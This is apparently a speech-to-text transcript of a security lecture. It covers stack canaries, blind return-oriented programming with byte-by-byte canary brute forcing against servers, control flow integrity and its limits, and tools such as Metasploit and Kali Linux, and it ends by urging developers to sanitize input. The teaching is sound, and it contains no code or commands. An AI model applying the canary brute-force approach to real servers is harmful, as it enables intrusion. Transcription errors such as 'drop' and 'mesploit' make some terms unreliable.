linux so now we're going to think game over right? there's no possibility we can do this except what we can do is well there's two things if we can guess the canary we can overwrite the correct value right fundamentally we can still sometimes overwrite the function frame if the canary only protects the epilogue and not save the epilogue then we can overwrite save the epilogue and as we saw we can use that to shift the stack and control everything so and we're making game over again of course some very smart people came up with this approach called drop which stands for blind return oriented programming which works against the target server so let's say like a web server that has a buffer overflow has canaries essentially the idea is when you do an overflow you're only changing that last byte of the canary value so if you can change that last byte of the canary value then the other thing I should say canary values don't change between different requests to the program so usually canary value is randomly determined on startup and then that value is used so the idea is if I use if I'm able to write onto the stack and I can overwrite the last canary value I can try 0 to 255 and one of those will work the rest of them will crash the program and so then I brute force one byte of the canary and then I can do it again with another 255 and get the second byte, the third byte, the fourth byte that way I can break the canary and this paper and these tools actually show you how from there you can get lines and rough attack and figure out gadgets in a completely blind manner which require a lot of requests but still actually work so this should terrify you nothing to say except for control flow integrity so the idea here I'm trying to get through this so we can start on that one control flow integrity the central idea here is the problem is in all these attacks all from the return of my function to the start of system process that control flow if you think about all the paths to the program there's only a fixed number of control flows so it's actually a super old idea from 2005 that says hey every time there's a return or a start of a function check where you're going or where you came from to make sure that it was actually intended by the program so control flow integrity essentially it turns out that even if you have perfect control flow integrity there isn't enough of dynamic stuff that can go on there's a paper called control flow breaking I believe or control flow banding where even by going through the program graph in the exact right control flow order you can cause arbitrary commutation that happen and have basically the same as a raw attack so everything's horrible just so that you've never taken a security class to worry about mesploit mesploit is a tool that has a lot of known attacks for known systems so you can download this you can actually run and shoot mesploits at various systems it's free it's kind of cool and Kali Linux it still is Kali right did they change the name of something like shoot Kali it still is right so this is the next distribution that's actually very cool that you can install and play with that has all these security tools pre-installed that has mesploit that has literally any kind of scanning all of the wire sharp the packet capture tools that we talked about okay so in conclusion you should be terrified, nothing works you can exploit applications for providing unexpected inputs generating unexpected environmental conditions you must sanitize user input as a developer it's on you to be aware of what are the potential security problems with your system so the idea is safety you know you can't code securely 100% of the time no one person can and no team can so you need to think about safe ways of coding safe languages trying to use existing protection mechanisms to try to mitigate risk as much as you can even if you do all that so to completely turn around you still have problems with the application's logic so still like we said if you still have a coupon system that allows you to use a coupon and keep using it enough time to reduce the price to free that's still a vulnerability in your application it's not a memory corruption vulnerability it's a problem with your application's logic so this is your job as a security analyst is to understand and look at each program adversarily that's why the homework you're doing now is so important because you're looking at each level and thinking how can I break this using every possible way you can this is what you have to do when you're looking at an application how can I break this how can I make it do what it's not supposed to do alright, thanks is this the last homework assignment or the final thing cool, alright we're going to start now next week